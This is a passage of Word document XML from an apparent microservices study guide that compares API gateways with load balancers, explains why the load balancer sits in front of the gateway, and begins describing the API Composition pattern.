          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5946106A" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="001F531C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0080193F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Load Balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="56CFF372" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7964CE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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B43304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pplication-level request routing, filtering, and orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BA0119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Network-level or HTTP-level traffic distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="38C77614" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02BB469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OSI Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658FD1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7 (Application Layer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59554F1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ayer 4 (Transport) or Layer 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="40C53742" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57099F8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Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2738E138"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uth, routing, rate limiting, logging, transformation, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C24F48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Just distributes traffic to healthy instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="0173C0D9" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E5A78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rvice Awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D57F97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Knows about services and endpoints (e.g., /user, /order)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="430A693A"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Works with IPs/ports, not specific API routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="00E39888" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50B9F21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ecurity &amp; Policies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08892B1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upports auth, CORS, throttling, API keys, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11478C7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Doesn’t enforce security at app level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="1C12A52C" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="365F45D7"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ching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="000717EF"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Can cache API responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B2DEE1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Generally does not cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="6918BCC3" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1257436E"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38C2A083"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Microservices gateway, API management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D949B5B"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Load distribution across app servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0080193F" w:rsidRPr="0080193F" w14:paraId="2C753ECE" w14:textId="77777777" w:rsidTr="001F531C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750E6259"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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DFE48C"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Spring Cloud Gateway, Kong, NGINX (as gateway), AWS API GW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4F9E34"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AWS ALB/NLB, NGINX, HAProxy, GCP Load Balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28F73FE0"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6265B63C">
          <v:rect id="_x0000_i3143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A4274"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Deployment Order: Which Comes First?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B419F6"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Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554A039"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5A938AD7"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694235AA"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Load Balancer] (e.g., AWS ALB, NGINX LB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11B99D"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3F0A835E"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115E83FE"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API Gateway Cluster] (e.g., Spring Cloud Gateway, Kong)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA6EC1"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p>
    <w:p w14:paraId="2F77C6E5" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="005D2794">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115FE82" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="005D2794">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices: Auth, User, Orders, etc.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1875C"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Load Balancer comes before the API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842AEDB"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It distributes traffic across multiple API Gateway instances for high availability and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313B10FA" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="0080193F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Then the API Gateway handles the actual request routing, authentication, logging, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420725C1"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730D07FE">
          <v:rect id="_x0000_i3144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27403C46"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Real Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66551721"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In AWS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696534B0" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="0080193F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Route53 (DNS) → ALB → Spring Cloud Gateway (ECS or EKS) → User/Order Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA32CC3" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="00000000" w:rsidP="0080193F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="55F88033">
          <v:rect id="_x0000_i3145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9131A" w14:textId="77777777" w:rsidR="0080193F" w:rsidRPr="0080193F" w:rsidRDefault="0080193F" w:rsidP="0080193F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="0080193F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEC5A2"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API Gateway is smarter (app-level), understands routes, applies policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB78E85" w14:textId="77777777" w:rsid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is simpler (network-level), just spreads load across instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282F0F6" w14:textId="3DF0D210" w:rsidR="0080193F" w:rsidRPr="00DE6155" w:rsidRDefault="0080193F" w:rsidP="0080193F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6155">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Load Balancer comes before API Gateway in most production architectures to scale the gateway layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B240DAC"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6090C083">
          <v:rect id="_x0000_i3146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D7007" w14:textId="4D31DB74" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="008A18B1" w:rsidP="007635D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="_Toc197867951"/>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is API Composition</w:t>
      </w:r>
      <w:r w:rsidR="007635D1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="737"/>
    </w:p>
    <w:p w14:paraId="5E640BD3" w14:textId="68748B2E" w:rsidR="003E28EC" w:rsidRPr="003E28EC" w:rsidRDefault="003E28EC" w:rsidP="00F91DCB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices integration pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where a separate service (often an API Gateway or Aggregator) calls </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple backend microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, combines their responses, and returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single unified response</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2687C0"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2794441F">
          <v:rect id="_x0000_i3147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4432B262"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Why Use API Composition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F2271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In a microservices architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD1FD1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Each service owns its </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>own data</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E61DA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But client requests often need </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data from multiple services</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., user info + orders + address).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280BD35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lastRenderedPageBreak/>
        <w:t>API Composition solves this by aggregating data from multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B7F511"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7E062DED">
          <v:rect id="_x0000_i3148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441710D"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Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B04C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Let’s say you want to get a </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user profile</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13D05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Basic user details (from user-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D59DA"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Order history (from order-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCC06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ddress (from address-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE492B"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out API Composition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9EC5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 must call 3 services and handle aggregation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024C6082"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With API Composition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F16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 single endpoint in an </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Composer</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calls the services and aggregates data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7733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lient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC5582"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6FF9231B"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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C4BC9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API Composer]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82E6F5"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user-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E32E81"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r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003E28EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BDB1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calls → address-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1191AF9F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B1033"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  ← aggregated response returned to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C793929"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4E1CE70A">
          <v:rect id="_x0000_i3149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192C26B"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Code Example in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FBCB08"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stController</w:t>
      </w:r>
    </w:p>
